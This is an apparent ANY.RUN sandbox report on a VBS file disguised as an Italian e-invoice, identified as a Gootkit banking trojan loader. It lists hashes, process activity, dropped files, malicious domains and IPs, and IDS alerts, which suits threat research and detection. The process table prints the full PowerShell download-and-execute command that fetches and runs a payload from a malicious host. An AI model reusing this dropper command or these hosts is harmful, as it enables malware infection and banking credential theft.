analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

_Nuovi Fattura elettronica 2018__85.vbs

Full analysis: https://app.any.run/tasks/58ddf88f-e025-4ef3-ae12-b63ac7f60159
Verdict: Malicious activity
Threats:

Gootkit is an advanced banking trojan. It is extremely good at evading detection and has an incredibly effective persistence mechanism, making it a dangerous malware that researchers and organizations should be aware of.

Analysis date: December 14, 2018, 12:21:34
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
trojan
loader
gootkit
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

B1964C6CF56F1529D255045DAF47BBF8

SHA1:

111D99AAEE4714CB13EB9B8208DE1E94481A0913

SHA256:

3EF1808D71F8D4CE398EF531FB16B3EACAF2FBFCCAF8E0D701209B1F94CA567C

SSDEEP:

3072:UzhhGSxg2BcZsKv5sDZjTbL4MEe9r7a9t598HMmrqIzOPDogrCqH18oi:UzhZxg2BcyKv+J3L4ME8r7a9T9ZmrqIz

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • tv_x64x32.exe (PID: 2892)
      • tv_x64x32.exe (PID: 552)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2264)
    • Changes settings of System certificates

      • tv_x64x32.exe (PID: 552)
    • Detected GootKit

      • tv_x64x32.exe (PID: 2892)
    • Changes internet zones settings

      • tv_x64x32.exe (PID: 2892)
  • SUSPICIOUS

    • Reads Internet Cache Settings

      • powershell.exe (PID: 2264)
    • Creates files in the user directory

      • powershell.exe (PID: 2264)
      • tv_x64x32.exe (PID: 552)
    • Executes PowerShell scripts

      • WScript.exe (PID: 2276)
    • Reads the machine GUID from the registry

      • powershell.exe (PID: 2264)
      • WScript.exe (PID: 2276)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2264)
    • Application launched itself

      • tv_x64x32.exe (PID: 2892)
    • Reads CPU info

      • tv_x64x32.exe (PID: 552)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
4
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start wscript.exe no specs powershell.exe #GOOTKIT tv_x64x32.exe tv_x64x32.exe

Process information

PID
CMD
Path
Indicators
Parent process
2276"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\_Nuovi Fattura elettronica 2018__85.vbs"C:\Windows\System32\WScript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
2264"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ufiyzdvfg = New-Object -ComObject Msxml2.XMLHTTP; $awyheifv = New-Object -ComObject ADODB.Stream; $sduvbjvb = $env:temp + '\tv_x64x32.exe';$ufiyzdvfg.open('GET', 'http://amd.coiten.com//upll?92818', $false);$ufiyzdvfg.send(); if($ufiyzdvfg.Status -eq "200"){$awyheifv.open();$awyheifv.type = 1;$awyheifv.write($ufiyzdvfg.responseBody);$awyheifv.position = 0;$awyheifv.savetofile($sduvbjvb);$awyheifv.close();} Start-Process $sduvbjvb;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2892"C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe" C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
552C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe --vwxyzC:\Users\admin\AppData\Local\Temp\tv_x64x32.exe
tv_x64x32.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 998
Read events
736
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
4
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
2264powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ALY6L7CWLR7L1DQFGMOS.temp
MD5:
SHA256:
2264powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:66C674FAF5938727AFF5D90EC5445F23
SHA256:7025A80E97465DFE4B836333C348311D668663138FCD18401D84684FC95FF272
2892tv_x64x32.exeC:\Users\admin\AppData\Local\Temp\tv_x64x32.infini
MD5:285F9CFD07DE99934A418B86B08F16EB
SHA256:FFD8E3E5F1D075D4E34C877C8CA2EC12B7277231D08E4D02F476DCFCC1149B6A
552tv_x64x32.exeC:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3896776584-4254864009-862391680-1000\578c3c4f2234dc4bd77dc4898cd130e8_eeeb5d54-7880-42a7-b542-739bbc26cf4bbinary
MD5:048DFB0DB1A17E5A42297F75919751EA
SHA256:C5E610A2C0C9B6771ACAD79DF5226EB6622BC604EE051D5C0F68CEF442F1EC09
2264powershell.exeC:\Users\admin\AppData\Local\Temp\tv_x64x32.exeexecutable
MD5:A05CEB1E09CA311F7240963E262004AE
SHA256:C97F69CE9AFA5737E5BB313FA621E75445B0D2758C4F9804B25118245A14EB42
2264powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\upll[1].txtexecutable
MD5:A05CEB1E09CA311F7240963E262004AE
SHA256:C97F69CE9AFA5737E5BB313FA621E75445B0D2758C4F9804B25118245A14EB42
2264powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFa788a.TMPbinary
MD5:66C674FAF5938727AFF5D90EC5445F23
SHA256:7025A80E97465DFE4B836333C348311D668663138FCD18401D84684FC95FF272
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
23
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
552
tv_x64x32.exe
GET
200
109.230.199.169:443
https://drk.fm604.com/rbody32
SE
binary
3.75 Mb
malicious
552
tv_x64x32.exe
GET
200
109.230.199.169:443
https://drk.fm604.com/rbody320
SE
text
4 b
malicious
2264
powershell.exe
GET
200
31.214.157.31:80
http://amd.coiten.com//upll?92818
NL
executable
233 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
552
tv_x64x32.exe
109.230.199.169:443
drk.fm604.com
Portlane AB
SE
malicious
2264
powershell.exe
31.214.157.31:80
amd.coiten.com
easystores GmbH
NL
malicious

DNS requests

Domain
IP
Reputation
amd.coiten.com
  • 31.214.157.31
malicious
drk.fm604.com
  • 109.230.199.169
malicious
it.sunballast.de
unknown

Threats

PID
Process
Class
Message
2264
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2264
powershell.exe
A Network Trojan was detected
ET TROJAN Possible Windows executable sent when remote host claims to send a Text File
552
tv_x64x32.exe
Generic Protocol Command Decode
SURICATA STREAM excessive retransmissions
Process
Message
tv_x64x32.exe
MP3 file corrupted
tv_x64x32.exe
WMA 0
tv_x64x32.exe
WMA 3
tv_x64x32.exe
552:C:\Users\admin\AppData\Local\Temp\tv_x64x32.exe --vwxyz Ignition....
tv_x64x32.exe
JS : RUN : tv_x64x32.exe, ver : 25.10.18.1117
tv_x64x32.exe
OGG 0